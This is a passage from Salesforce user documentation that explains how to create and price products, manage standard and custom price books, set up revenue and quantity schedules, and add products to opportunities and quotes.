the My Cases tab to submit your request directly.

Can I assign a Chatter Plus user a task related to an
opportunity?

No. Chatter Plus users don't have access to opportunities.

See Also:
Activities FAQ

TRACKING PRODUCTS, AND THEIR PRICES AND SCHEDULES

Products, Price Books, and Schedules Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Combined, products and price books let you keep track of the products and services your company offers, and the various
prices at which they are sold. In turn, schedules determine the payment and delivery cycles of your products.

Products

Products are the individual items or services that you sell to customers through your opportunities and quotes.
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You can create a product and associate it with a price in a price book. Each product can exist in many different price books
with many different prices.

The Products related list of an opportunity detail page and the Quote Line Items related list of a quote detail page list the
products for that record. Use this related list to associate a price book with the opportunity or quote, add or edit products,
and, for opportunities, establish or edit product schedules.

Price Books

A price book is a list of products and their associated prices. Each product and its price is called a price book entry.

Salesforce provides two types of price books—standard and custom.

• The standard price book is a master list of all products with their associated default or standard prices. It automatically lists
all products and standard prices regardless of the custom price books that also contain them.

• A custom price book is a list of products with their custom or list prices, making them ideal for offering different prices to
different market segments. Custom price books can contain discounted list prices or list prices that are higher than the
standard price.

For example, let’s say you want one set of prices for domestic orders and another for international orders. Your products and
their standard prices are automatically listed in the standard price book. In this case, you can create two additional custom
price books—an international price book and a domestic one—to suit the different markets.

Schedules

Schedules determine the payment and delivery cycles for a product. After you’ve established pricing for your products, you can
establish default schedules on a product, as well as schedules for individual line items (opportunity products) on an opportunity.

Default schedules are suitable if all your customers make product payments on the same timetable or you deliver products on
a regular schedule. However, if your users typically customize schedules, there’s no advantage to creating default schedules.

Your administrator determines which types of schedules your organization can use: quantity schedules, revenue schedules, or
both. Your administrator also specifies which types of schedules can be established for each separate product.

• Quantity Schedule—Suitable if your customers pay all at once, but receive the product in increments—for example an
annual magazine subscription for a monthly-issued magazine. Outlines the dates, number of units, and number of installments
for payments, shipping, or other use as determined by your organization.

• Revenue Schedule—Suitable if your customers make regular payments but receive the product all at once—for example,
if you sell customized products that are charged in installments, but delivered at one time. Outlines the dates, revenue
amounts, and number of installments for payments, recognizing revenue, or other use.

• Revenue and Quantity Schedule—Suitable if your customers receive their order on a delivery schedule and also pay for
the products using a payment schedule—for example, a monthly product subscription that’s paid for on a monthly basis.

See Also:
Adding Products to Opportunities
Creating Custom Price Books
Establishing Schedules on Opportunity Products
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Products Home
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on productsTo view Products tab:

“Read” on productsTo view products:

“Create” on productsTo create products:

“Read” on assetsTo view assets:

“Read” on products and price booksTo view price books:

Clicking the Products tab displays the products home page.

• In the Find Products section, enter product search terms and click Find Product to search for products that match your
search terms. We recommend entering a search term of at least two characters, but you can leave this field empty to display
a list of all products.

• In the Price Books section, select a price book to view a list of products within that price book or click Create New View
to define your own custom price book view.

• In the Product Views section, choose a list view from the drop-down list to go directly to that product list page, or click
Create New View to define your own product custom view.

• In the Asset Views section, choose an asset list view from the drop-down list to go directly to that list page, or click Create
New View to define your own custom view to list assets.

• In the Recent Products section, select an item from the drop-down list to display a brief list of the top products matching
that criteria. From the list, you can click any product to go directly to the product detail. Toggle the Show 25 items and
Show 10 items links to change the number of items that display. The fields you see are determined by the “Products Tab”
search layout defined by your administrator and by your field-level security settings (available in Enterprise, Unlimited,
and Developer Editions only). The Recent Products choices are:

DescriptionRecent Products Choice

The last ten or twenty-five products created, with the most
recently created product listed first. This list only includes
records owned by you.

Recently Created

The last ten or twenty-five products updated, with the most
recently updated product listed first. This list only includes
records owned by you.

Recently Modified

• In the Recent Products section, click New to create a product.

• In Reports, click Go to Reports to create customized reports that include your product and price book information.

• Administrators and users with the appropriate permissions can click Manage Price Books to open the Price Books tab to
create, clone, activate, or deactivate price books.
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• If products are shared with external contacts via Salesforce to Salesforce, choose one of the list views under Products from
Connections to view products that your business partners have shared with you.

See Also:
Products, Price Books, and Schedules Overview
Viewing and Editing Products

Price Books Home
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on products and price booksTo view the Price Books tab:

“Read” on products and price booksTo view price books:

“Create” on price booksTo create price books:

“Create” on price booksTo clone price books:

“Edit” on price booksTo change price books:

Clicking the Price Books tab displays the price books home page, where you can:

• Create a custom price book.

• Select a list view from the drop-down list to go directly to that list page, or define your own price book custom view. From
the list view, you can:

◊ View a list of entries for the selected price book.

◊ Activate or deactivate a price book.

• Click any price book name listed to view details, including a list of products within that price book. From the details page,
you can:

◊ Edit the properties of the price book, such as activating it or changing its name.

◊ Clone the price book to create a new price book with the same product entries.

◊ Add a new product entry to the price book. If no products are available, the button is not displayed.

◊ Edit all product entries in the price book at once.

◊ Edit a single product entry.

See Also:
Creating Custom Price Books
Choosing a Price Book for an Opportunity or Quote
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Creating Products
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on productsTo view products:

“Create” on productsTo create products:

To create a new product:

1. Select Product from the Create New drop-down list in the sidebar, or click New next to Recent Products on the products
home page.

2. Enter a name for the product.
3. Enter any additional information for the product. See Product, Price Book, and Schedule Fields on page 1090 for a description

of each field.
4. Click Save when you are finished or click Save & Add Price to save the current product and enter a standard price.

Note:  To ensure fast system performance with price books, keep the number of products below two million.

Optionally, you also can:

• Click Add in the Standard Price related list to add an associated price and currency to the new product.

• Click Add to Price Book from the Price Books related list to include the new product in a price book. Products must have
a standard price before you can add them to a price book. See Setting Product Prices on page 1088.

• Click Edit above the product detail to create a default schedule. See Creating and Editing Default Schedules on page 1099.

See Also:
Product, Price Book, and Schedule Fields
Using Product Families
Using the Entitlement Templates Related List
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Creating Custom Price Books
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create” on price booksTo create price books:

“Read” on products and price booksTo view price books:

A price book is a list of products and their associated prices. Each product and its price is called a price book entry.

Salesforce provides two types of price books—standard and custom.

• The standard price book is a master list of all products with their associated default or standard prices. It automatically lists
all products and standard prices regardless of the custom price books that also contain them.

• A custom price book is a list of products with their custom or list prices, making them ideal for offering different prices to
different market segments. Custom price books can contain discounted list prices or list prices that are higher than the
standard price.

To create a custom price book for your organization:

1. On the Price Books tab, click New.
2. Enter a name for your price book.
3. Optionally, enter a description.
4. Select Active to make the price book available from opportunities and quotes.
5. Optionally, select an existing price book to add its products and prices to the new price book.
6. Click Save.

Note:  To ensure fast system performance with price books, keep the number of products below two million.

See Also:
Product, Price Book, and Schedule Fields
Cloning Price Books
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Setting Product Prices
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on productsTo set prices:

You can have up to three different types of prices for products to fit the way your organization prices products.

• Standard Price—The default price you associate with a product, which is automatically included in your Standard Price
Book.

• List Price—The custom price associated with a product in a custom price book. For example, let’s say you need one set of
prices for domestic orders and another for international orders. List prices can be lower or higher than standard price.

• Sales Prices—The prices applied to products that you add to your opportunities or quotes. Sale prices can be different than
both list prices and standard prices. For example, if you need to offer a special discount on an opportunity.

Note:  You can expand the format of your price fields to up to eight decimal places to the right of the decimal point.
Contact salesforce.com to expand your decimal place settings.

Setting Standard Prices

Before you can add a new product to an opportunity, quote, or custom price book, you must add a a standard price to the
product and mark it as active. This is the default pricing of the product.

To create a standard price for a product:

1. Select the product.
2. From the product detail page, click Add  from the Standard Price related list. If you have already added a standard price,

click Edit to change it or Edit All to edit all standard prices in other currencies.
3. Enter the standard price.
4. Select Active to make this price available to products on opportunities, quotes, or other custom price books.
5. Click Save. The standard price is automatically associated with the product in your standard price book.

Setting List Prices

If you have created custom price books, you can assign a list price for a product. The list price is available to use when you add
that product to an opportunity or quote from any customized price books your organization has created.

Before you begin, the product must have a standard price. To add a list price:

1. Select the product.
2. From the product detail page, click Edit from the Price Books related list next to the custom price book that should contain

the list price.

Click Add to Price Book from the Price Books related list if you have not already added the product to a custom price
book.

3. Enter the list price. Alternatively, select Use Standard Price if both prices are the same.
4. Select Active to make this price available to products on opportunities or quotes.
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5. Click Save.

Setting Sales Prices

Regardless of the price book used, you can specify a sale price for any product that you add to an opportunity or quote. By
default, the sale price for a product added to an opportunity or quote is the product’s list price from the price book unless you
specify a different price.

See Also:
Adding Products to Opportunities
Using Product Families

Associating Price Books and Products
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on productsTo view products:

“Read” on products and price booksTo view price books:

You can associate products and price books with either each other, or with opportunities, quotes, or service contracts. For
example:

• On a product detail page, click Add to Price Book on the Price Books related list to select a price book to contain the
product. This button is available only if the product has a standard price.

• On a price book detail page, click Add on the Products related list to select a product to include in the price book.

• On an opportunity detail page, click Add Product on the Products related list to select a product to list on the opportunity.

• On a quote detail page, click Add Line Item on the Quote Line Items related list to select a product to list on the quote.

• On a service contract detail page, click Add Line Item on the Contract Line Items related list to select a product to list
on the service contract.

See Also:
Searching for Products
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Product, Price Book, and Schedule Fields
Available in: Professional, Enterprise, Unlimited, and Developer Editions

A product has the following fields, listed in alphabetical order. Depending on your page layout and field-level security settings,
some fields may not be visible or editable.

Product Fields

DescriptionField

Indicates whether the product is ready for use in a price book,
opportunity, or quote and whether you can find the product
in searches and see the product in views.

Active

Name of the user who created the product.Created By

Name of the user who last saved the product record.Last Modified By

Internal code or product number used to identify the product.Product Code

In multicurrency organizations, the currency you want to use
for the product. If the product currency is different from the

Product Currency

user currency, currency-related fields for opportunities, quotes,
and quote line items appear in both currencies. The product's
currency is converted to the user's currency and the converted
amount appears in parentheses.

Text to distinguish this product from other products.Product Description

Category of the product.Product Family

Title for the product.Product Name

Indicates whether the product can have a quantity schedule.Quantity Scheduling Enabled

Indicates whether the product can have a revenue schedule.Revenue Scheduling Enabled

Listing of custom links for products from Salesforce.Custom Links

Price Book Fields

DescriptionField

Indicates whether you can add the price book to an opportunity
or quote.

Active

Name of the user who created the price book.Created By

Text to distinguish this price book from others.Description

Read-only checkbox that indicates whether the item is the
standard price book.

Is Standard Price Book

Date of the most recent save to the record.Last Modified By
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DescriptionField

Title for the price book.Price Book Name

Price Book Entry Fields

DescriptionField

Indicates whether the price book entry (product and list price)
is active and can be added to an opportunity or quote.

Active

Price of the product within the price book including currency.List Price

Title for the product.Product Name

Internal code or product number used to identify the product.Product Code

Schedule Fields

DescriptionField

Defines whether the product revenue or quantity will be
divided into multiple installments or repeated for multiple
installments.

Schedule Type

Sets the interval for installments; for example, Weekly,
Monthly.

Installment Period

Number of installments in the schedule.Number of Installments

See Also:
Creating Products
Creating Custom Price Books

1091

Product, Price Book, and Schedule FieldsManaging Activities, Opportunities, and Products



VIEWING AND EDITING PRODUCTS AND PRICE BOOKS

Viewing Product Lists
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on productsTo view products:

“Create” on productsTo create products:

“Edit” on productsTo change products:

The products list page displays a list of products in the selected view. To show a filtered list of items, select a predefined list
from the View drop-down list, or click Create New View to define your own custom views. To edit or delete any view you
created, select it from the View drop-down list and click Edit.

• Click a product name to view detailed product information.

• If Chatter is enabled, click  or  to follow or stop following a product in your Chatter feed..
• Click Add or select Product from the Create New drop-down list in the sidebar to create a new product.

• Click Edit to change product details.

Viewing and Editing Products
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on productsTo view products:

“Edit” on productsTo change products:

Viewing Products

Once you have located a product on the products home or list pages, click the name to display detailed information.

Viewing Product Updates and Comments (Chatter)

Display a Chatter feed of updates, comments, and posts about the product.
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Editing Products

Users can update a product by clicking Edit next to the product, and changing selected fields. When you have finished,
click Save.

Viewing and Editing Product Related Lists

Below the product detail is information related to the product, such as standard prices, price books, assets, and entitlement
templates. The related lists you see are determined by your personal customization and any customization your
administrator has made to page layouts or your permissions to view related data. You can click on individual items to
display additional information about them. Click more at the bottom of the page or View More below a related list to
display more items.
• Click Add in the Standard Price related list to associate a standard price (and currency if you have multiple currencies)

with the product.
• Click Edit next to the standard price to change it or click Edit All in the Standard Price related list to make changes

to all prices in any currencies listed.
• Click Add to Price Book in the Price Books related list to select a price book to contain the product.

• Click Edit All in the Price Books related list to make changes to all list prices for the product in any price book.

• Click the price book name to view details of the price book or click Edit next to the price book to change the list
price of the product.

• Click New in the Assets related list to create a new asset based on the current product. Assets only display in this
list if you have sharing access to the account on the asset or the account related to the contact on the asset.

To return to the last list page you viewed, click Back to list at the top of the product detail page. If your organization has
enabled collapsible page sections, use the arrow icons next to the section headings to expand or collapse each section on the
detail page.

See Also:
Setting Product Prices

Viewing and Editing Price Books
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on products and price booksTo view price books:

“Edit” on price booksTo change price books:

“Create” on price booksTo clone price books:

The standard price book is automatically generated by Salesforce to include all the products in your organization and their
standard prices. Users can edit the standard price book or activate it. They can also create custom price books to include selected
products and list prices.
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Viewing Price Books —After you’ve found a price book listed on the Price Books tab, click the name to view detailed
information. All price book entries are listed in the Products related list. Alternatively, to view the price book’s entries, select
a list view and click View beside the price book.

Editing Price Books —To update a price book, click Edit next to the price book name, and then change the fields that you
want to update. When you have finished, click Save. Click Clone to create a new price book that contains the same products.

Viewing and Editing Price Book Related Lists—Below the price book detail is a Products related list for price book entries
(products and their associated prices within the price book). You can click Edit or Edit All to update price book entries or
list prices. Click Add to include more products in the price book. Click more at the bottom of the page to display more items
or fewer to display a shorter list.

See Also:
Creating Custom Price Books

Viewing Price Book Entries
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on price books

AND

“Read” on products

To view price book entries:

“Edit” on price booksTo change price book entries:

To view entries in a price book, select a list view on the Price Books tab and click View beside the price book.

From the price book’s list page, you can view details of price book entries.

• If your view contains entries from a single price book, select multiple price book entries listed and click Edit Selected to
make changes to many entries at once.

• If you are viewing entries from a single price book, click Add to search for and add a list price and product to the price
book.

• Click Edit to change the properties of a price book entry.

• Click any column heading to sort the entries in ascending order using that column’s information. Click a column heading
a second time to sort in descending order.

• At the top and bottom of the list, click a letter to display the contents of the sorted column that begin with that character.

• Click the Next Page  or Previous Page links to go to the next or previous set of price book entries.
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• At the bottom of the list, select fewer or more to view a shorter or longer display list.

See Also:
Creating Custom Price Books
Viewing and Editing Price Books

Sharing Price Books
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on price booksTo share price books:

Your administrator defines the default access your entire organization has to price books. Administrators and users with the
“Edit” permission on price books can extend sharing of a price book manually to more users. However, you cannot change the
sharing model to make it more restrictive than the default.

To view and manage sharing details, click Sharing on the price book detail page. The Sharing Detail page lists the users,
groups, roles, and territories that have sharing access to the price book. On this page, you can do any of the following:

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views.To edit or delete any view you created, select it from the View drop-down list and click Edit.

• Click Add to grant access to the record for other users, groups, roles, or territories.

• For manual sharing rules that you created, click Edit or Del next to an item in the list to edit or delete the access level.

Tip:  If your organization-wide default for price books is “No Access,” give your entire organization “View Only”
access to your Standard Price Book so that users can see prices on the product detail page.
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Cloning Products
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on productsTo view products:

“Create” on products

AND

“Read” on price books

To clone products:

The Clone button on a product quickly creates a new product with the same information as the existing product. Cloning
products also creates any price book entries in price books that you can view. Price book entries in price books that you do not
have sharing access to will not be created.

1. Click Clone on an existing product.
2. Enter or change any information for the new product.
3. Click Save.

Note:  If you have read-only access to a field, the value of that field is not carried over to the cloned record.

See Also:
Product, Price Book, and Schedule Fields

Cloning Price Books
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create” on price booksTo clone price books:

Use the Clone button on a price book to quickly create a new price book with the same information as the selected price book.
To clone a price book for your organization:

1. Click Clone on an existing price book.
2. Enter or change any information for the new price book.
3. Click Save.
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Note:  If you have read-only access to a field, the value of that field is not carried over to the cloned record.

See Also:
Product, Price Book, and Schedule Fields

DELETING PRODUCTS AND PRICEBOOKS

Deleting Products and Price Books Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Delete” on productsTo delete products:

“Delete” on price booksTo delete price books:

“Edit” on opportunitiesTo delete opportunity products:

“Edit” on quotesTo delete quote line items:

Deleting products or price books is unique because both can have related price book entries. When you delete either a product
or a price book, all related price book entries are also deleted.

However, if you have several price books that contain the same product, deleting the product from one price book doesn’t
affect the other price books. Similarly, if you delete a price book, the products it contained are not deleted or removed from
any other price book.

Note:

• You can’t delete a product if opportunities, quotes, service contracts, or contract line items are associated with it.

• You can’t delete a product or price book that's associated with an approval process or has a pending workflow
action.

Before you begin, review your options for deleting products and price books with related records:

• Does it have a related price book entry?

You can delete a product or price book that has associated price book entries. Salesforce moves it to the Recycle Bin
temporarily, from where you can restore it. All price book entries are deleted or restored along with their related product
or price book.

• Is it on an opportunity or quote?
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If your product or price book is used on an opportunity or quote, you have three options:

◊ Deactivate it by editing it and deselecting the Active field. We recommend deactivating a product or price book that
is on an opportunity or quote because it will no longer be available to users but you can activate it again if necessary.

◊ Remove the related product or price book from all opportunities and quotes. When you try to delete a product or price
book that is used on an opportunity or quote, Salesforce displays a list of the opportunities or quotes using it. If you
are deleting a price book, go to each opportunity or quote listed and remove the price book from them. If you are
deleting a product, remove the product from every opportunity and quote that uses it. Then, delete the price book or
product and it will be stored in the Recycle Bin temporarily, during which time, you can recover it and all its related
price book entries.

◊ Archive the product or price book and each related price book entry. Archived products and price books can’t be
recovered because they are not stored in the Recycle Bin, so use this option with caution. Additionally, archived products
and price books still appear on any opportunities or quotes that contained them before they were archived.

Note:  If you choose to archive a price book instead of deleting the associated records and then deleting the
price book, it will still be visible in the associated records but won’t be accessible. After you archive a price
book, you can’t retrieve it.

Deleting Products
Available in: Professional, Enterprise, Unlimited, and Developer Editions

To delete a product, click Delete from the product detail page to move it to the Recycle Bin. When you delete a product, all
related price book entries are also deleted. If you restore the product from the Recycle Bin, any related price book entries are
restored with it.

Note:

• You can’t delete a product if opportunities, quotes, service contracts, or contract line items are associated with it.

• You can't delete a product that's used on an opportunity or quote. If you try to delete it, Salesforce displays a list
of the opportunities and quotes so you can remove the product from those opportunities and quotes and try again.
If you don't want to remove the product from all opportunities and quotes, you can deactivate (which is the
recommended approach) or archive the product instead. See Deleting Products and Price Books Overview on
page 1097.

Deleting Price Books
Available in: Professional, Enterprise, Unlimited, and Developer Editions

To delete a price book, click Delete on the price book detail page to move it to the Recycle Bin. When you delete a price
book, all its related entries are also deleted. If you restore the price book from the Recycle Bin, all its related entries are also
restored.
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You can’t delete the Standard Price Book or a price book that’s on an opportunity or quote. If you try to delete a price book
that’s used on an opportunity or quote, Salesforce.com displays a list of the affected opportunities and quotes.

If you don’t want to remove the price book from those opportunities and quotes, we recommend that you deactivate it. To
deactivate the price book, click Deactivate on the price book list view.

Alternatively, to archive the price book, click Archive on the price book detail page. This option should be used with caution.
See Deleting Products and Price Books Overview on page 1097.

Creating and Editing Default Schedules
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on productsTo create schedules:

“Edit” on productsTo edit schedules:

Before creating default schedules, make sure the appropriate schedule types are enabled.

To create and edit default schedules:

1. Select the product from the products home page.
2. Click Edit above the product detail.
3. Set the schedule details.

DescriptionField

Defines whether the product revenue or quantity will be
divided into multiple installments or repeated for multiple
installments.

Schedule Type

Sets the interval for installments; for example, Weekly,
Monthly.

Installment Period

Number of installments in the schedule.Number of Installments

Note:  For example, if the product unit price is $100 and you specify a revenue schedule with ten monthly
installments, a Schedule Type of “Divide” will create ten installments of $10 each, and “Repeat” as the Schedule
Type will create ten installments of $100 each for a total of $1000.

4. Click Save.

If you add or change a default schedule for a product, opportunities with that product are not updated. If a product has both
a default quantity schedule and a default revenue schedule, the quantity schedule is calculated first to determine the total
product revenue, and then the revenue schedule is applied to that amount.

If you have a quote line item with a discount, you can't edit the Discount field if the corresponding product record has a
default schedule.
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Examples

The following examples illustrate some common uses of default schedules.

Default Revenue Schedule Only–Your ASP company sells yearly contracts of product licenses at $1200 per license per year.
When a customer buys licenses, the licenses are all “delivered” at one time, but you recognize the revenue on a monthly basis.
In this case, you would set a revenue schedule of Schedule Type=Divide, Installment Period=Monthly, and Number of
Installments=12.

With this default revenue schedule, a salesperson sells 200 licenses at a unit price of $1200 per license per year on an opportunity
on March 15. The 200 licenses are all “delivered” on March 15. The total revenue for this product is the quantity of 200
multiplied by the unit price of $1200 per year, for a total yearly revenue of $240,000. The revenue schedule automatically
divides the total revenue into monthly installments of $20,000 on the 15th of every month for the next year.

Default Quantity Schedule Only–Your medical supplies company sells a box of tongue depressors for $10 per box. You
normally have yearly contracts with hospitals to deliver boxes every month. In this case, you would set a quantity schedule of
Schedule Type=Repeat, Installment Period=Monthly, and Number of Installments=12.

With this default quantity schedule, a salesperson sells 1000 boxes on an opportunity on January 1. The quantity schedule
automatically creates 12 monthly installments of 1000 boxes each, for a total quantity of 12,000 boxes. The total revenue from
this opportunity is calculated using the unit price and the total quantity, so $120,000 is booked on January 1.

Default Quantity and Revenue Schedules–Your manufacturing company sells widgets for $10 each. You normally have yearly
contracts to deliver widgets on a weekly basis, but your customers pay quarterly. In this case, you would set a quantity schedule
of Schedule Type=Repeat, Installment Period=Weekly, and Number of Installments=52. You would also set a revenue schedule
of Schedule Type=Divide, Installment Period=Quarterly, and Number of Installments=4.

With these default schedules, a salesperson sells 2000 widgets on an opportunity on January 1. The quantity schedule is applied
first, and it schedules 2000 widgets to be delivered every week for a year, for a total quantity of 104,000. The total revenue is
calculated using the unit price and the total quantity. The total revenue of $1,040,000 is then divided into quarterly installments
of $260,000 each.

See Also:
Setting Product Prices

Editing Schedules
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on opportunitiesTo create schedules:

“Edit” on opportunitiesTo edit schedules:

To edit an existing schedule for a product on an opportunity:

1. Click the product name in the Products related list.
2. Click Edit on the Schedule related list of the product detail.
3. In the list of installments, add comments or change the dates, quantities, and revenue amounts.
4. Click Recalculate to preview the new total revenue and/or quantity of the product.
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The product totals are the sum of the installments. Any changes you make will override the product totals currently stored
for the product.

5. Click Save to finish.

Note:  If you cannot easily obtain the results you want by manually editing the schedule installments, you can return
to the product detail and click Re-Establish to delete the old schedule and create a new one.

See Also:
Products, Price Books, and Schedules Overview
Establishing Schedules on Opportunity Products

WORKING WITH PRODUCTS AND OPPORTUNITIES

Choosing a Price Book for an Opportunity or Quote
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on opportunities

AND

“Read” on price books

To select price books:

“Edit” on quotes

AND

“Read” on price books

To select price books on quotes:

To include products on an opportunity or quote, you must first choose a price book that contains the products you want to
add. You can add products or quote line items only from a single price book. Click Choose Price Book in the Products related
list on an opportunity or the Quote Line Items related list on a quote to select a price book. This button appears when you
have access to more than one price book.
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Note:  The last price book you used on an opportunity or quote is selected by default.

If you change the price book for an opportunity that has products, all products are deleted from the Products related
list, but the value in the opportunity's Amount field remains.

See Also:
Creating Custom Price Books
Adding Products to Opportunities

Adding Products to Opportunities
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on opportunities

AND

“Read” on products and price books

To select opportunity products:

To add products to an opportunity:

1. Select a price book.
2. Click Add Product on the Products related list.
3. Select one or more products.
4. Type the attributes for each product. Your administrator may have customized this page to include fields specific to your

business.
5. Type the Sales Price for the product. The Sales Price defaults to the List Price specified in the price book. Depending

on your user permissions, you may be able to override this value.
6. Type the number of products at this price in the Quantity box.
7. Click Save.

Note:  If the product has default schedules, Salesforce creates the schedules automatically when you add the product
to the opportunity. The opportunity Amount is the sum of the related products. You cannot directly edit the Amount
unless you first delete all of the products from the opportunity. For multicurrency organizations, the opportunity
Currency is tied to the currency of the associated price book entry. You cannot directly edit the Currency unless
you first delete all of the products from the opportunity.

See Also:
Sorting Products on Opportunities and Quotes
Establishing Schedules on Opportunity Products
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Editing Products on Opportunities
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on opportunities

AND

“Read” on products and price books

To edit opportunity products:

To edit a product on an opportunity:

1. Click Edit next to the product name on the Products related list of the opportunity, or to edit all of the products at one
time, click Edit All.

2. Type the values for each product. Your administrator may have customized this page to include fields specific to your
business.

3. Type the Sales Price for the product.
4. Type the number of products at the current sales price in the Quantity field.
5. If the product has a discount, type it as a number with or without the percent sign (%) in the Discount field. You can

use up to two decimal places.
6. Click Save.

Note:

• If the opportunity product has a revenue or quantity schedule, you can’t edit the Discount field.

In addition, field-level security is disabled by default for the Discount field. If you want to add the field to the
page layout, you can enable field-level security.

• If an opportunity is syncing with a quote, and the quote record is locked by an approval process, you can’t edit the
opportunity products.

See Also:
Product, Price Book, and Schedule Fields
Establishing Schedules on Opportunity Products
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Sorting Products on Opportunities and Quotes
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on opportunities

AND

“Read” on products and price books

To sort opportunity products:

“Edit” on quotes

AND

“Read” on products and price books

To sort quote line items:

Products appear in alphanumeric order by default on the Products and Quote Line Items related lists, but you can sort them
into any order you like. For example, you might want to group related line items together on a quote you're sending to a
customer. Syncing a quote with an opportunity also syncs product sort order.

1. Click Sort in the Products related list on an opportunity or the Quote Line Items related list on a quote.
2. Select a product, and use the arrows to move it up or down the list.
3. Click Save.

See Also:
Editing Products on Opportunities

Deleting Products from Opportunities
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on opportunities

AND

“Read” on products and price books

To select opportunity products:

If an opportunity is synced with a quote, deleting products from the opportunity also deletes the line items from the Quote
Line Items related list for the corresponding quote.

On the Products related list on an opportunity detail page, either:
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• Click Del next to the product.
• Click the product name to open the opportunity product detail page and click Delete.

See Also:
Products, Price Books, and Schedules Overview

Establishing Schedules on Opportunity Products
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on opportunitiesTo create schedules:

“Edit” on opportunitiesTo edit schedules:

To create a new schedule for a product on an opportunity:

1. Click the product name in the Products related list.
2. Click Establish to create a new schedule, or click Re-Establish to delete the old schedule and create a new one. (See

Editing Schedules to edit an existing schedule.)
3. Select the type of schedule to create: quantity, revenue, or both. Your choices are limited by your organization’s schedule

settings, and by the schedule types your administrator has enabled for the product.
4. Set the schedule details. See Schedule Fields on page 1091 for a description of scheduling fields.

For example, if the product unit price is $100 and you specify a revenue schedule with ten monthly installments, a Schedule
Type of “Divide” will create ten installments of $10 each, and “Repeat” as the Schedule Type will create ten installments
of $100 each for a total of $1000.

5. Click Save to display the schedule installments.
6. If necessary, edit the installments as described in Editing Schedules on page 1100.

If you have a quote line item with a discount, you can't edit the Discount field if the corresponding opportunity product has
an individual schedule.

Products with Default Schedules

If a product has default schedules established on the product record, the schedules are automatically created when you add the
product to the opportunity. The dates of the installments begin with the date you specified when adding the product. If you
left the product date blank, the installment dates begin with the opportunity Close Date.

If you add or change a default schedule for a product, opportunities with that product are not updated. If a product has both
a default quantity schedule and a default revenue schedule, the quantity schedule is calculated first to determine the total
product revenue, and then the revenue schedule is applied to that amount.
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If you have a quote line item with a discount, you can't edit the Discount field if the corresponding product record has a
default schedule.

See Also:
Products, Price Books, and Schedules Overview

Searching for Products
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on productsTo view products:

You can add products to price books, opportunities, quotes, and service contracts.

1. Enter your search keywords to return matches in standard or custom text fields.
2. To narrow your search results, click More filters and select the filters you want.

Tip:  Search by keyword or filter criteria either alone or together. When used together, Salesforce finds records
that match both your keyword and filter criteria.

3. Click Search.
4. Click the alphabetical index links to filter your search results by initial letter.
5. Select the checkboxes next to the records you want. Optionally, select the checkbox in the column header to select all

currently displayed items. You can also use the Selected drop-down list to select or clear all records on the page. You can
select a maximum of 50 records. If more than 50 records appear on the page, you can’t select them all using the column
header or the Selected drop-down list.

6. If your search finds many records, use the number of records drop-down list to specify the maximum number of records
to display on each page.

7. Click the Previous and Next links or enter a page number in the Page box to display another page of products. Your
selections persist when you move to a different page. These navigation tools work only if your search results contain fewer
than 2,000 records.

8. Click Select.

Note:  To display newly added products, click Refresh (  ). This ensures that your search results are current.

See Also:
Optimizing Search Results for Products
Understanding Product Search Fields
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Optimizing Search Results for Products

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on productsTo view products:

When searching for products, use the following guidelines to optimize your results.

• Find products easily. You can use global search—but not sidebar search or advanced search.
• Type your keywords in the same format as you would for an advanced or global search. For example, type a keyword to

find records that contain that keyword in standard or custom text fields. Type more than one keyword to find records that
contain any or all keywords. To find exact phrases, enclose keywords in quotes.

• Use an asterisk (*) wildcard character in the same way as you would for an advanced or global search.
• Use field filters, operators, and values to improve your search results. For example, List Price greater than

1,000.
• When filtering search results, limit the search to records that contain neither blank nor null values for a particular field,

by choosing the field and the not equal to operator, and leaving the third field blank.
• Click column headings to sort the results in ascending or descending order. Sorting applies across all search results for a

particular object, including those on subsequent pages. You can’t click on column headings for multi-select picklist fields
because you can’t sort the multi-select picklist field type.

• Work with your administrator to select the columns you want to appear in your search results.
• Change the order of displayed columns by dragging them to a new position in the table. Salesforce doesn’t save these

changes.
• If you’re searching for products to add to a price book and the standard price book is not activated, ensure that the Price

Book Name and Active (Price Book) columns aren’t displayed. These columns search for products that are included in the
standard price book when it’s activated. So, if the standard price book is deactivated, your search results will be empty.
Alternatively, you can display these columns and activate the standard price book to return a list of all products that match
your search criteria.

See Also:
Searching for Products
Understanding Product Search Fields
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Understanding Product Search Fields

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on productsTo view products:

When you search for products, Salesforce finds matches in the following fields.

• Product Name

• Product Code

• Product Description

• Any custom fields of type auto-number, text, text area, long text area, email, or phone
• Any custom fields that are set as an external ID

See Also:
Searching for Products

Using the Entitlement Templates Related List
